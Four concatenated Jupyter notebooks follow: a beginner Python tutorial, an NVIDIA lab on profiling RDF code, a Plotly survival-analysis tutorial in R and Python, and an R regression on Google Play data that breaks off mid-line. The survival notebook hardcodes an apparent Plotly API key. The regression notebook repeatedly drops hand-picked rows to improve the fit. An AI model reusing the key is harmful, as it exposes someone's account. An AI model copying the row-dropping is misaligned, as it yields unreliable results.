# The Zen of Python The Zen of Python is a collection of 19 "guiding principles" for writing computer programs that influence the design of the Python programming language. Software engineer Tim Peters wrote this set of principles and posted it on the Python mailing list in 1999. Peters's list left open a 20th principle "for Guido to fill in", referring to Guido van Rossum, the original author of the Python language. The vacancy for a 20th principle has not been filled. - Beautiful is better than ugly. - Explicit is better than implicit. - Simple is better than complex. - Complex is better than complicated. - Flat is better than nested. - Sparse is better than dense. - Readability counts. - Special cases aren't special enough to break the rules. - Although practicality beats purity. - Errors should never pass silently. - Unless explicitly silenced. - In the face of ambiguity, refuse the temptation to guess. - There should be one—and preferably only one—obvious way to do it. - Although that way may not be obvious at first unless you're Dutch. - Now is better than never. - Although never is often better than right now. - If the implementation is hard to explain, it's a bad idea. - If the implementation is easy to explain, it may be a good idea. - Namespaces are one honking great idea—let's do more of those! # Try Python Now Select the following code block. Click Cell Menu (on the top) > Run Cells. You can also press Ctrl+Enter. ``` print ("This is Python!") ``` But this isn't fun right? The following block creates two variables and put numbers in them, and then compares which number is larger. Feel free to play around and change the numbers and see how it affects the results. ``` a = 10 b = 15 if b > a: print("B is greater") elif a > b: print ("A is greater") else: print ("Both are same") ``` The following block creates a list of three fruit names (saved as String). Then we loop over all the fruit names and print a sentence. 
``` fruits = ["Apple", "Banana", "Mango"] for fruit in fruits: print ("I eat "+fruit) ``` # What is Anaconda? Anaconda is a free and open-source distribution of the Python and R programming languages for scientific computing (data science, machine learning applications, large-scale data processing, predictive analytics, etc.), that aims to simplify package management and deployment. There are several alternatives, however Anaconda is the most popular due to simplicity of managing the python components. Jupyter Notebook (formerly IPython Notebooks) is a web-based interactive computational environment for creating Jupyter notebook documents. The "notebook" term can colloquially make reference to many different entities, mainly the Jupyter web application, Jupyter Python web server, or Jupyter document format. # Markdown Hello this is a text. This is not python code. This will not run. But this will be displayed properly. # This is a heading ## This is a smaller heading ### This is an even smaller heading If you see hash (#) symbol in the beginning of each heading, you are currently in the edit mode. If you don't, double click this text and edit something. Click Run Cell (or Ctrl+Enter) again to update it. Remember you'll need to save the file to preserve the changes. psst... sometimes anaconda may save automatically. Here're the reasons why you should use markdown cells: 1. It makes your notes look better 1. It helps other programmers understand what you are doing # More Python Create a new block below. Click on Insert Menu > Insert Cell below. You can also use the shortcut key. In that cell, write 10+20 and verify that the output is correct. Did you create a new block above this cell? If you didn't, you can still do it by pressing ESCAPE key to go to the command mode of Jupyter, and press 'A' key to create. You can do all the basic arithmetic or logical operations on number literals or variables. Play around with the following code block. 
``` 20/3 20%3 ``` The % operator is called the **modulus** operator, which will divide the first number by the second number and return the *remainder* as output. > Some of you might know it already In Python, we can write a print statement like: `print ("Hello Julia")` and it should get printed. # Table in Markdown | Sno | Student Name | | --- | ------------ | | 1 | Narender | ``` | Sno | Student Name | | --- | ------------ | | 1 | Narender | ``` You can double click this cell to see the actual raw syntax behind the fancy formatting. # Comments in Python Comments are used to explain the code, make notes to help other programmers, or make notes for future scope. They are mostly used to make code readable. ``` # This is a comment print ("Hello World!") # This is a string statement print (5+9) # This is a number print ('The end!') # Bye ``` # Errors in Python If something goes wrong, Python gives a detailed description of what went wrong. **NameError** is raised when a local or global name is not found. The associated value is an error message that includes the name that could not be found. In simple words, the Python interpreter doesn't understand what a particular word you used means. One of the most common causes for this kind of error is misspelling, or not initializing or importing the mentioned object. The following block shows an error that tells you the line that caused the error, and an error message that explains the error. Can you fix it? ``` myname = "Jones" print ("Hello "+mynaam) ``` # Importing Libraries Anaconda is a suite of tools you need to build modern software and data science projects. These tools and features are packed in *packages* that you need to *import* before you can use them in your code. Run the following block. It's a joke feature added in Python. It will open another browser tab containing a comic about how powerful Python is. 
``` import antigravity ``` ## Testing Required Packages We should see if the packages we need for this course are ready to be used. The following code should run without errors. ### ModuleNotFoundError If you see an error that looks like the following, the mentioned module or package is not present in your python environment. ``` ----> 1 import pandas as pd 2 import numpy as np 3 import matplotlib.pyplot as plt 4 5 np.random.seed(0) ModuleNotFoundError: No module named 'pandas' ``` If you see an error like this, you can install it by visiting Package Manager in the *Anaconda Navigator*. You can also install it by adding a code block below and typing `%pip install pandas`. If some other package caused this issue, you can replace its name instead. The output should say `Successfully installed pandas`. If everything went right, you should be able to see a chart showing a normal distribution. ``` %pip install matplotlib import pandas as pd import numpy as np import matplotlib.pyplot as plt np.random.seed(0) values = np.random.randn(100) s = pd.Series(values) s.plot(kind='hist', title='Normally distributed random values') plt.show() ``` Verifying if scikit-learn package is working fine. Run the following block. If you see a ModuleNotFoundError, you can install it using `%pip install scikit-learn`. ``` import sklearn ``` # A Fun Mini-Game Run the following block to play a short game in which you have to guess a number. The first block imports the required package and creates an empty list of winners. The second block runs the game. You can play as often as you like. Play around and make changes in the code. This code block also introduces some more basics of Python programming. If something breaks, you can still look at the git and copy the correct code. ``` import random score_history = [] secret_number = random.randint(1,100) count = 0 playername = input("What's your name?") gamewon = True print ("Welcome "+playername+". 
In this game, you will guess a number between 1 to 100. I will give you hints. Let's see how you perform") while True: guess = int (input("Enter your Guess: ")) count += 1 if guess == secret_number: print ("You win the game") break else: if guess < secret_number: print ("No. Try a higher number") if guess > secret_number: print ("No. Try a lower number") if count>11: print ("Sorry. I can't give you more tries. You lost.") gamewon = False break score = 11-count if gamewon: print ("Congratulations.. your score is {}".format(11-count)) score_history.append(playername+"\t"+str(score)) print () print ('\n') print (" = = = = = = Hall of Fame = = = = = = ") for row in score_history: print (row) ```
github_jupyter
## RDF The radial distribution function (RDF) denoted in equations by g(r) defines the probability of finding a particle at a distance r from another tagged particle. The RDF is strongly dependent on the type of matter so will vary greatly for solids, gases and liquids. <img src="../images/rdf.png" width="60%" height="60%"> As you might have observed, the code complexity of the algorithm is $N^{2}$. Let us get into the details of the sequential code. **Understand and analyze** the code present at: [RDF Serial Code](../../source_code/serial/rdf.cpp) [File Reader](../../source_code/serial/dcdread.h) [Makefile](../../source_code/serial/Makefile) Open the downloaded file for inspection. ``` !cd ../../source_code/serial && make clean && make ``` We plan to follow the typical optimization cycle that every code needs to go through <img src="../images/workflow.png" width="70%" height="70%"> In order to analyze the application, we will make use of the profiler "nsys" and add "nvtx" marking into the code to get more information out of the serial code. Before running the cells below, let's first start by diving into the profiler lab to learn more about the tools. Using the profiler gives us the hotspots and helps to understand which function is important to be made parallel. ----- # <div style="text-align: center ;border:3px; border-style:solid; border-color:#FF0000 ; padding: 1em">[Profiling lab](../../../../../profiler/English/jupyter_notebook/nsight_systems.ipynb)</div> ----- Now that we are familiar with the Nsight Profiler and know how to use [NVTX](../../../../../profiler/English/jupyter_notebook/nsight_systems.ipynb#nvtx), let's profile the serial code and check out the output. ``` !cd ../../source_code/serial&& nsys profile -t nvtx --stats=true --force-overwrite true -o rdf_serial ./rdf ``` Once you run the above cell, you should see the following in the terminal. 
<img src="../images/serial.png" width="70%" height="70%"> To view the profiler report, you would need to [Download the profiler output](../../source_code/serial/rdf_serial.qdrep) and open it via the GUI. For more information on how to open the report via the GUI, please check out the section on [How to view the report](../../../../../profiler/English/jupyter_notebook/profiling-c.ipynb#gui-report). From the timeline view, right click on the nvtx row and click the "show in events view". Now you can see the nvtx statistics at the bottom of the window, which show the duration of each range. In the following labs, we will look into the profiler report in more detail. <img src="../images/nvtx_serial.png" width="100%" height="100%"> The obvious next step is to make the **Pair Calculation** algorithm parallel using different approaches to GPU Programming. Please follow the link below and choose one of the approaches to parallelise the serial code. ----- # <div style="text-align: center ;border:3px; border-style:solid; border-color:#FF0000 ; padding: 1em">[HOME](../../../nways_MD_start.ipynb)</div> ----- # Links and Resources <!--[OpenACC API guide](https://www.openacc.org/sites/default/files/inline-files/OpenACC%20API%202.6%20Reference%20Guide.pdf)--> [NVIDIA Nsight System](https://docs.nvidia.com/nsight-systems/) <!--[NVIDIA Nsight Compute](https://developer.nvidia.com/nsight-compute)--> <!--[CUDA Toolkit Download](https://developer.nvidia.com/cuda-downloads)--> [Profiling timelines with NVTX](https://devblogs.nvidia.com/cuda-pro-tip-generate-custom-application-profile-timelines-nvtx/) **NOTE**: To be able to see the Nsight System profiler output, please download the latest Nsight Systems version from [here](https://developer.nvidia.com/nsight-systems). Don't forget to check out additional [OpenACC Resources](https://www.openacc.org/resources) and join our [OpenACC Slack Channel](https://www.openacc.org/community#slack) to share your experience and get more help from the community. 
--- ## Licensing This material is released by OpenACC-Standard.org, in collaboration with NVIDIA Corporation, under the Creative Commons Attribution 4.0 International (CC BY 4.0).
github_jupyter
In this notebook, we introduce survival analysis and we show application examples using both R and Python. We will compare the two programming languages, and leverage Plotly's Python and R APIs to convert static graphics into interactive `plotly` objects. [Plotly](https://plotly.com) is a platform for making interactive graphs with R, Python, MATLAB, and Excel. You can make graphs and analyze data on Plotly’s free public cloud. For collaboration and sensitive data, you can run Plotly [on your own servers](https://plotly.com/product/enterprise/). For a more in-depth theoretical background in survival analysis, please refer to these sources: - [Lecture Notes by John Fox](http://socserv.mcmaster.ca/jfox/Courses/soc761/survival-analysis.pdf) - [Wikipedia article](http://en.wikipedia.org/wiki/Survival_analysis) - [Presentation by Kristin Sainani](www.pitt.edu/~super4/33011-34001/33051-33061.ppt) - [Lecture Notes by Germán Rodríguez](http://data.princeton.edu/wws509/notes/c7.pdf) Need help converting Plotly graphs from R or Python? - [R](https://plotly.com/r/user-guide/) - [Python](https://plotly.com/python/matplotlib-to-plotly-tutorial/) For this code to run on your machine, you will need several R and Python packages installed. - Running `sudo pip install <package_name>` from your terminal will install a Python package. - Running `install.packages("<package_name>")` in your R console will install an R package. You will also need to create an account with [Plotly](https://plotly.com/feed/) to receive your API key. ``` # You can also install packages from within IPython! 
# Install Python Packages !pip install lifelines !pip install rpy2 !pip install plotly !pip install pandas # Load extension that let us use magic function `%R` %load_ext rpy2.ipython # Install R packages %R install.packages("devtools") %R devtools::install_github("ropensci/plotly") %R install.packages("OIsurv") ``` ## Introduction [Survival analysis](http://en.wikipedia.org/wiki/Survival_analysis) is a set of statistical methods for analyzing the occurrence of events over time. It is also used to determine the relationship of co-variates to the time-to-events, and accurately compare time-to-event between two or more groups. For example: - Time to death in biological systems. - Failure time in mechanical systems. - How long can we expect a user to be on a website / service? - Time to recovery for lung cancer treatment. The statistical term 'survival analysis' is analogous to 'reliability theory' in engineering, 'duration analysis' in economics, and 'event history analysis' in sociology. The two key functions in survival analysis are the *survival function* and the *hazard function*. The **survival function**, conventionally denoted by $S$, is the probability that the event (say, death) has not occurred yet: $$S(t) = Pr(T > t),$$ where $T$ denotes the time of death and $Pr$ the probability. Since $S$ is a probability, $0\leq S(t)\leq1$. Survival times are non-negative ($T \geq 0$) and, generally, $S(0) = 1$. The **hazard function** $h(t)$ is the event (death) rate at time $t$, conditional on survival until $t$ (i.e., $T \geq t$): \begin{align*} h(t) &= \lim_{\Delta t \to 0} Pr(t \leq T \leq t + \Delta t \, | \, T \geq t) \\ &= \lim_{\Delta t \to 0} \frac{Pr(t \leq T \leq t + \Delta t)}{S(t)} = \frac{p(t)}{S(t)}, \end{align*} where $p$ denotes the probability density function. In practice, we do not get to observe the actual survival function of a population; we must use the observed data to estimate it. 
A popular estimate for the survival function $S(t)$ is the [Kaplan–Meier estimate](http://en.wikipedia.org/wiki/Kaplan–Meier_estimator): \begin{align*} \hat{S}(t) &= \prod_{t_i \leq t} \frac{n_i − d_i}{n_i}\,, \end{align*} where $d_i$ is the number of events (deaths) observed at time $t_i$ and $n_i$ is the number of subjects at risk observed at time $t_i$. ## Censoring Censoring is a type of missing data problem common in survival analysis. Other popular comparison methods, such as linear regression and t-tests do not accommodate for censoring. This makes survival analysis attractive for data from randomized clinical studies. In an ideal scenario, both the birth and death rates of a patient is known, which means the lifetime is known. **Right censoring** occurs when the 'death' is unknown, but it is after some known date. e.g. The 'death' occurs after the end of the study, or there was no follow-up with the patient. **Left censoring** occurs when the lifetime is known to be less than a certain duration. e.g. Unknown time of initial infection exposure when first meeting with a patient. <hr> For following analysis, we will use the [lifelines](https://github.com/CamDavidsonPilon/lifelines) library for python, and the [survival](http://cran.r-project.org/web/packages/survival/survival.pdf) package for R. We can use [rpy2](http://rpy.sourceforge.net) to execute R code in the same document as the python code. 
``` # OIserve contains the survival package and sample datasets %R library(OIsurv) %R library(devtools) %R library(plotly) %R library(IRdisplay) # Authenticate to plotly's api using your account %R py <- plotly("rmdk", "0sn825k4r8") # Load python libraries import numpy as np import pandas as pd import lifelines as ll # Plotting helpers from IPython.display import HTML %matplotlib inline import matplotlib.pyplot as plt import plotly.plotly as py import plotly.tools as tls from plotly.graph_objs import * from pylab import rcParams rcParams['figure.figsize']=10, 5 ``` ## Loading data into Python and R We will be using the `tongue` dataset from the `KMsurv` package in R, then convert the data into a pandas dataframe under the same name. This data frame contains the following columns: - type: Tumor DNA profile (1=Aneuploid Tumor, 2=Diploid Tumor) - time: Time to death or on-study time, weeks - delta Death indicator (0=alive, 1=dead) ``` # Load in data %R data(tongue) # Pull data into python kernel %Rpull tongue # Convert into pandas dataframe from rpy2.robjects import pandas2ri tongue = pandas2ri.ri2py_dataframe(tongue) ``` We can now refer to `tongue` using both R and python. ``` %%R summary(tongue) tongue.describe() ``` We can even operate on R and Python within the same code cell. ``` %R print(mean(tongue$time)) print tongue['time'].mean() ``` In R we need to create a `Surv` object with the `Surv()` function. Most functions in the `survival` package apply methods to this object. For right-censored data, we need to pass two arguments to `Surv()`: 1. a vector of times 2. a vector indicating which times are observed and censored ``` %%R attach(tongue) tongue.surv <- Surv(time[type==1], delta[type==1]) tongue.surv ``` - The plus-signs identify observations that are right-censored. # Estimating survival with Kaplan-Meier ### Using R The simplest fit estimates a survival object against an intercept. However, the `survfit()` function has several optional arguments. 
For example, we can change the confidence interval using `conf.int` and `conf.type`. See `help(survfit.formula)` for the comprehensive documentation. ``` %%R surv.fit <- survfit(tongue.surv~1) surv.fit ``` It is often helpful to call the `summary()` and `plot()` functions on this object. ``` %%R summary(surv.fit) %%R -h 400 plot(surv.fit, main='Kaplan-Meier estimate with 95% confidence bounds', xlab='time', ylab='survival function') ``` Let's convert this plot into an interactive plotly object using [plotly](https://plotly.com) and [ggplot2](http://ggplot2.org). First, we will use a helper ggplot function written by [Edwin Thoen](http://www.r-statistics.com/2013/07/creating-good-looking-survival-curves-the-ggsurv-function/) to plot pretty survival distributions in R. ``` %%R ggsurv <- function(s, CI = 'def', plot.cens = T, surv.col = 'gg.def', cens.col = 'red', lty.est = 1, lty.ci = 2, cens.shape = 3, back.white = F, xlab = 'Time', ylab = 'Survival', main = ''){ library(ggplot2) strata <- ifelse(is.null(s$strata) ==T, 1, length(s$strata)) stopifnot(length(surv.col) == 1 | length(surv.col) == strata) stopifnot(length(lty.est) == 1 | length(lty.est) == strata) ggsurv.s <- function(s, CI = 'def', plot.cens = T, surv.col = 'gg.def', cens.col = 'red', lty.est = 1, lty.ci = 2, cens.shape = 3, back.white = F, xlab = 'Time', ylab = 'Survival', main = ''){ dat <- data.frame(time = c(0, s$time), surv = c(1, s$surv), up = c(1, s$upper), low = c(1, s$lower), cens = c(0, s$n.censor)) dat.cens <- subset(dat, cens != 0) col <- ifelse(surv.col == 'gg.def', 'black', surv.col) pl <- ggplot(dat, aes(x = time, y = surv)) + xlab(xlab) + ylab(ylab) + ggtitle(main) + geom_step(col = col, lty = lty.est) pl <- if(CI == T | CI == 'def') { pl + geom_step(aes(y = up), color = col, lty = lty.ci) + geom_step(aes(y = low), color = col, lty = lty.ci) } else (pl) pl <- if(plot.cens == T & length(dat.cens) > 0){ pl + geom_point(data = dat.cens, aes(y = surv), shape = cens.shape, col = cens.col) } 
else if (plot.cens == T & length(dat.cens) == 0){ stop ('There are no censored observations') } else(pl) pl <- if(back.white == T) {pl + theme_bw() } else (pl) pl } ggsurv.m <- function(s, CI = 'def', plot.cens = T, surv.col = 'gg.def', cens.col = 'red', lty.est = 1, lty.ci = 2, cens.shape = 3, back.white = F, xlab = 'Time', ylab = 'Survival', main = '') { n <- s$strata groups <- factor(unlist(strsplit(names (s$strata), '='))[seq(2, 2*strata, by = 2)]) gr.name <- unlist(strsplit(names(s$strata), '='))[1] gr.df <- vector('list', strata) ind <- vector('list', strata) n.ind <- c(0,n); n.ind <- cumsum(n.ind) for(i in 1:strata) ind[[i]] <- (n.ind[i]+1):n.ind[i+1] for(i in 1:strata){ gr.df[[i]] <- data.frame( time = c(0, s$time[ ind[[i]] ]), surv = c(1, s$surv[ ind[[i]] ]), up = c(1, s$upper[ ind[[i]] ]), low = c(1, s$lower[ ind[[i]] ]), cens = c(0, s$n.censor[ ind[[i]] ]), group = rep(groups[i], n[i] + 1)) } dat <- do.call(rbind, gr.df) dat.cens <- subset(dat, cens != 0) pl <- ggplot(dat, aes(x = time, y = surv, group = group)) + xlab(xlab) + ylab(ylab) + ggtitle(main) + geom_step(aes(col = group, lty = group)) col <- if(length(surv.col == 1)){ scale_colour_manual(name = gr.name, values = rep(surv.col, strata)) } else{ scale_colour_manual(name = gr.name, values = surv.col) } pl <- if(surv.col[1] != 'gg.def'){ pl + col } else {pl + scale_colour_discrete(name = gr.name)} line <- if(length(lty.est) == 1){ scale_linetype_manual(name = gr.name, values = rep(lty.est, strata)) } else {scale_linetype_manual(name = gr.name, values = lty.est)} pl <- pl + line pl <- if(CI == T) { if(length(surv.col) > 1 && length(lty.est) > 1){ stop('Either surv.col or lty.est should be of length 1 in order to plot 95% CI with multiple strata') }else if((length(surv.col) > 1 | surv.col == 'gg.def')[1]){ pl + geom_step(aes(y = up, color = group), lty = lty.ci) + geom_step(aes(y = low, color = group), lty = lty.ci) } else{pl + geom_step(aes(y = up, lty = group), col = surv.col) + geom_step(aes(y = 
low,lty = group), col = surv.col)} } else {pl} pl <- if(plot.cens == T & length(dat.cens) > 0){ pl + geom_point(data = dat.cens, aes(y = surv), shape = cens.shape, col = cens.col) } else if (plot.cens == T & length(dat.cens) == 0){ stop ('There are no censored observations') } else(pl) pl <- if(back.white == T) {pl + theme_bw() } else (pl) pl } pl <- if(strata == 1) {ggsurv.s(s, CI , plot.cens, surv.col , cens.col, lty.est, lty.ci, cens.shape, back.white, xlab, ylab, main) } else {ggsurv.m(s, CI, plot.cens, surv.col , cens.col, lty.est, lty.ci, cens.shape, back.white, xlab, ylab, main)} pl } ``` Voila! ``` %%R -h 400 p <- ggsurv(surv.fit) + theme_bw() p ``` We have to use a workaround to render an interactive plotly object by using an iframe in the ipython kernel. This is a bit easier if you are working in an R kernel. ``` %%R # Create the iframe HTML plot.ly <- function(url) { # Set width and height from options or default square w <- "750" h <- "600" html <- paste("<center><iframe height=\"", h, "\" id=\"igraph\" scrolling=\"no\" seamless=\"seamless\"\n\t\t\t\tsrc=\"", url, "\" width=\"", w, "\" frameBorder=\"0\"></iframe></center>", sep="") return(html) } %R p <- plot.ly("https://plotly.com/~rmdk/111/survival-vs-time/") # pass object to python kernel %R -o p # Render HTML HTML(p[0]) ``` The `y axis` represents the probability a patient is still alive at time $t$ weeks. We see a steep drop off within the first 100 weeks, and then observe the curve flattening. The dotted lines represent the 95% confidence intervals. ### Using Python We will now replicate the above steps using python. Above, we have already specified a variable `tongues` that holds the data in a pandas dataframe. ``` from lifelines.estimation import KaplanMeierFitter kmf = KaplanMeierFitter() ``` The method takes the same parameters as it's R counterpart, a time vector and a vector indicating which observations are observed or censored. 
The model fitting sequence is similar to the [scikit-learn](http://scikit-learn.org/stable/) api. ``` f = tongue.type==1 T = tongue[f]['time'] C = tongue[f]['delta'] kmf.fit(T, event_observed=C) ``` To get a plot with the confidence intervals, we simply can call `plot()` on our `kmf` object. ``` kmf.plot(title='Tumor DNA Profile 1') ``` Now we can convert this plot to an interactive [Plotly](https://plotly.com) object. However, we will have to augment the legend and filled area manually. Once we create a helper function, the process is simple. Please see the Plotly Python [user guide](https://plotly.com/python/overview/#in-%5B37%5D) for more insight on how to update plot parameters. > Don't forget you can also easily edit the chart properties using the Plotly GUI interface by clicking the "Play with this data!" link below the chart. ``` p = kmf.plot(ci_force_lines=True, title='Tumor DNA Profile 1 (95% CI)') # Collect the plot object kmf1 = plt.gcf() def pyplot(fig, ci=True, legend=True): # Convert mpl fig obj to plotly fig obj, resize to plotly's default py_fig = tls.mpl_to_plotly(fig, resize=True) # Add fill property to lower limit line if ci == True: style1 = dict(fill='tonexty') # apply style py_fig['data'][2].update(style1) # Change color scheme to black py_fig['data'].update(dict(line=Line(color='black'))) # change the default line type to 'step' py_fig['data'].update(dict(line=Line(shape='hv'))) # Delete misplaced legend annotations py_fig['layout'].pop('annotations', None) if legend == True: # Add legend, place it at the top right corner of the plot py_fig['layout'].update( showlegend=True, legend=Legend( x=1.05, y=1 ) ) # Send updated figure object to Plotly, show result in notebook return py.iplot(py_fig) pyplot(kmf1, legend=False) ``` <hr> # Multiple Types ### Using R Many times there are different groups contained in a single dataset. These may represent categories such as treatment groups, different species, or different manufacturing techniques. 
The `type` variable in the `tongues` dataset describes a patients DNA profile. Below we define a Kaplan-Meier estimate for each of these groups in R and Python. ``` %%R surv.fit2 <- survfit( Surv(time, delta) ~ type) p <- ggsurv(surv.fit2) + ggtitle('Lifespans of different tumor DNA profile') + theme_bw() p ``` Convert to a Plotly object. ``` #%R ggplotly(plt) %R p <- plot.ly("https://plotly.com/~rmdk/173/lifespans-of-different-tumor-dna-profile/") # pass object to python kernel %R -o p # Render HTML HTML(p[0]) ``` ### Using Python ``` f2 = tongue.type==2 T2 = tongue[f2]['time'] C2 = tongue[f2]['delta'] ax = plt.subplot(111) kmf.fit(T, event_observed=C, label=['Type 1 DNA']) kmf.survival_function_.plot(ax=ax) kmf.fit(T2, event_observed=C2, label=['Type 2 DNA']) kmf.survival_function_.plot(ax=ax) plt.title('Lifespans of different tumor DNA profile') kmf2 = plt.gcf() ``` Convert to a Plotly object. ``` pyplot(kmf2, ci=False) ``` <hr> # Testing for Difference It looks like DNA Type 2 is potentially more deadly, or more difficult to treat compared to Type 1. However, the difference between these survival curves still does not seem dramatic. It will be useful to perform a statistical test on the different DNA profiles to see if their survival rates are significantly different. Python's *lifelines* contains methods in `lifelines.statistics`, and the R package `survival` uses a function `survdiff()`. Both functions return a p-value from a chi-squared distribution. It turns out these two DNA types do not have significantly different survival rates. 
### Using R

```
%%R
survdiff(Surv(time, delta) ~ type)
```

### Using Python

```
from lifelines.statistics import logrank_test

# `alpha` is a confidence level in (0, 1], not a percentage: use 0.99, not 99.
summary_ = logrank_test(T, T2, C, C2, alpha=0.99)
print(summary_)
```

<hr>

# Estimating Hazard Rates

### Using R

To estimate the hazard function, we compute the cumulative hazard function using the [Nelson-Aalen estimator](https://en.wikipedia.org/wiki/Nelson%E2%80%93Aalen_estimator), defined as:

$$\hat{\Lambda} (t) = \sum_{t_i \leq t} \frac{d_i}{n_i}$$

where $d_i$ is the number of deaths at time $t_i$ and $n_i$ is the number of susceptible individuals. Both R and Python modules use the same estimator. However, in R we will use the `-log` of the Fleming and Harrington estimator, which is equivalent to the Nelson-Aalen.

```
%%R
haz <- Surv(time[type==1], delta[type==1])
haz.fit <- summary(survfit(haz ~ 1), type='fh')

x <- c(haz.fit$time, 250)
y <- c(-log(haz.fit$surv), 1.474)
cum.haz <- data.frame(time=x, cumulative.hazard=y)

p <- ggplot(cum.haz, aes(time, cumulative.hazard)) + geom_step() +
    theme_bw() + ggtitle('Nelson-Aalen Estimate')
p

%R p <- plot.ly("https://plotly.com/~rmdk/185/cumulativehazard-vs-time/")

# pass object to python kernel
%R -o p

# Render HTML
HTML(p[0])
```

### Using Python

```
from lifelines.estimation import NelsonAalenFitter
naf = NelsonAalenFitter()
naf.fit(T, event_observed=C)

naf.plot(title='Nelson-Aalen Estimate')

naf.plot(ci_force_lines=True, title='Nelson-Aalen Estimate')
py_p = plt.gcf()
pyplot(py_p, legend=False)

from IPython.display import display, HTML
display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />'))
display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">'))

!
pip install publisher --upgrade import publisher publisher.publish( 'survival_analysis.ipynb', 'ipython-notebooks/survival-analysis-r-vs-python/', 'Survival Analysis with Plotly: R vs Python', 'An introduction to survival analysis with Plotly graphs using R, Python, and IPython notebooks', name='Survival Analysis with Plotly') ```
github_jupyter
``` library(ggplot2) # ggplot library(ggfortify) # autoplot library(gridExtra) library(dplyr) # select #(a) 수리시간(Minutes) 와 부품의 수(Units) 를 관계시키는 선형 회귀 모형을 적합 setwd('D:/Working/03.Korea/회귀분석/Final-Report/google-play-store-apps') # kaggle 데이터 # $ 환율은 1177.42 gplay_data <- read.csv(file="googleplaystore.csv", header=TRUE, sep=",") gplay_data[1:5,] gplay_data$Category <- as.numeric(as.factor(gplay_data$Category)) # Category 를 수치형으로 변경 gplay_data$Type <- as.numeric(as.factor(gplay_data$Type)) # Type (Free / Paid) 를 수치형으로 변경 gplay_paid_data <- subset(gplay_data, Type == "2") gplay_data[1:5,] gplay_reg = lm(Rating ~ ., gplay_data) summary(gplay_reg) gplay_data <- gplay_data %>% dplyr::select(-Installs, -Price) # 결정 된 항목의 열을 삭제 gplay_reg = lm(Rating ~ ., gplay_data) summary(gplay_reg) gplay_paid_data <- subset(gplay_data, Type == "2") gplay_paid_data[1:5,] gplay_free_data <- subset(gplay_data, Type == "1") gplay_free_data[1:5,] gplay_paid_data <- subset(gplay_paid_data, Last_Updated == "2017") rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) gplay_paid_data[1:5,] gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) gplay_paid_data <- gplay_paid_data[c(-30,-1),] gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data %>% dplyr::select(-Type, -Last_Updated) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-11,-20, -55),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_reg = 
lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-43, -21, -1),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., gplay_paid_data) summary(gplay_reg) par(mfrow=c(2,2)) plot(gplay_reg) rownames(gplay_paid_data) <- 1:nrow(gplay_paid_data) nrow(gplay_paid_data) gplay_paid_data <- gplay_paid_data[c(-10,-19, -53),] gplay_paid_data <- gplay_paid_data[c(-6,-18, -51),] gplay_paid_data <- gplay_paid_data[c(-17, -25, -49),] gplay_paid_data <- gplay_paid_data[c(-16, -23, -47),] gplay_paid_data <- gplay_paid_data[c(-20, -38, -41),] gplay_paid_data <- gplay_paid_data[c(-19, -36, -39),] nrow(gplay_paid_data) gplay_reg = lm(Rating ~ ., 
